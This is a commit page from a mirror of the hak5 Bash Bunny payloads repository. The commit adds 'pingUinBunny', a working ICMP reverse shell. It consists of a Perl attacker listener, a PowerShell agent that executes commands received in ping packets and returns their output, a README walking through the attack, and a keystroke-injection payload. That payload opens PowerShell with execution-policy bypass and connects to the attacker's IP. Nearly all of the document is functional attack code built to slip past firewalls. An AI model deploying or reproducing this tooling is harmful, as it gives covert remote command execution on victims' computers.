hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Uploaded pingUinBunny 

a reverse shell using icmp
pull/480/head
0iphor13 2021-12-11 19:55:11 +01:00 committed by GitHub
parent 82592d435d
commit 12641377aa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 253 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

66
payloads/library/remote_access/switch1/Bunny.pl Normal file
View File

@ -0,0 +1,66 @@
#!/usr/bin/env perl
#
# icmpsh - simple icmp command shell
# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0iphor13 for pingUinBunny
#
#
#
#
use strict;
use IO::Socket;
use NetPacket::IP;
use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
use Net::RawIP;
use Fcntl;
print "Bunny waitin' for his friend...\n";
# create raw socket
my $sock = IO::Socket::INET->new(
Proto => "ICMP",
Type => SOCK_RAW,
Blocking => 1) or die "$!";
# set stdin to non-blocking
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
print "Let's wait for PingUin!\n";
my $input = '';
while(1) {
if ($sock->recv(my $buffer, 4096, 0)) {
my $ip = NetPacket::IP->decode($buffer);
my $icmp = NetPacket::ICMP->decode($ip->{data});
if ($icmp->{type} == ICMP_ECHO) {
# get identifier and sequencenumber
my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
# write data to stdout and read from stdin
print $data;
$input = <STDIN>;
# compile and send response
$icmp->{type} = ICMP_ECHOREPLY;
$icmp->{data} = pack("SSa*", $ident, $seq, $input);
my $raw = $icmp->encode();
my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
$sock->send($raw, 0, $addr) or die "$!\n";
}
}
}

105
payloads/library/remote_access/switch1/Invoke-pingUin.ps1 Normal file
View File

@ -0,0 +1,105 @@
function Invoke-pingUin
{
<#
Original script by nishang - modified by 0iphor13 for pingUinBunny
.PARAMETER IPAddress
The IP address of the server/listener to connect to.
.PARAMETER Delay
Time in seconds for which the script waits for a command from the server. Default is 5 seconds.
.PARAMETER BufferSize
The size of output Buffer. Defualt is 128.
.EXAMPLE
# sysctl -w net.ipv4.icmp_echo_ignore_all=1
# python icmpsh_m.py 192.168.254.226 192.168.254.1
Microsoft please don't block, oh dear microsoft corporation
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $false)]
[Int]
$Delay = 5,
[Parameter(Position = 2, Mandatory = $false)]
[Int]
$BufferSize = 128
)
#Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
$ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
$PingOptions = New-Object System.Net.NetworkInformation.PingOptions
$PingOptions.DontFragment = $True
$MicrosoftCopyright =@"
I'll pingUin! <3
__
-=(o '.
'.-.\
/| \\
'| ||
by 0iphor13 _\_):,_
Windows PowerShell running as user $env:username on $env:computername `n
"@;
# Copyright Copies Right
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
#Show an interactive PowerShell prompt
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
while ($true)
{
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
$reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)
#Check for Command from the server
if ($reply.Buffer)
{
$response = ([text.encoding]::ASCII).GetString($reply.Buffer)
$result = (Invoke-Expression -Command $response 2>&1 | Out-String )
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
$index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
$i = 0
#Fragmant larger output into smaller ones to send to the server.
if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
{
while ($i -lt $index )
{
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
$i +=1
}
$remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
if ($remainingindex -ne 0)
{
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
}
}
else
{
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
}
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
}
else
{
Start-Sleep -Seconds $Delay
}
}
}

39
payloads/library/remote_access/switch1/README.md Normal file
View File

@ -0,0 +1,39 @@
**Title: pingUinBunny**
Author: 0iphor13
Version: 1.0
What is pingUinBunny?
#
*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
*ICMP stands for Internet Control Message Protocol; it is used by network devices query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (Invoke-pingUin.ps1) and sends it commands to execute.*
#
There you go, a reverse shell.
Instruction:
Upload Bunny.pl onto your attacking machine.
Install dependencies, if needed:
IO::Socket,
NetPacket::IP,
NetPacket::ICMP
Disable ICMP replies by the OS:
*sysctl -w net.ipv4.icmp_echo_ignore_all=1*
Start Bunny.pl -> perl Bunny.pl
#
Plug in Bashbunny with pingUinBunny equipped.
Achieve reverse shell.
run away <3
Credit for code and ideas:
bdamele
nishang
krabelize

43
payloads/library/remote_access/switch1/payload.txt Normal file
View File

@ -0,0 +1,43 @@
#!/bin/bash
#
# Title: pingUinBunny
# Description: Get remote access using a icmp reverse shell.
# Author: 0iphor13
# Version: 1.0
# Category: Remote_Access
# Attackmodes: HID, Storage
LED SETUP
DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
DELAY 5000
RUN WIN "powershell -Exec Bypass"
DELAY 6000
Q ENTER
DELAY 10000
Q STRING "Import-Module ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Invoke-pingUin.ps1')"
DELAY 10000
Q ENTER
DELAY 10000
Q STRING "Invoke-pingUin -IpAddress 0.0.0.0"
DELAY 10000
Q ENTER
DELAY 5000
ATTACKMODE HID
LED FINISH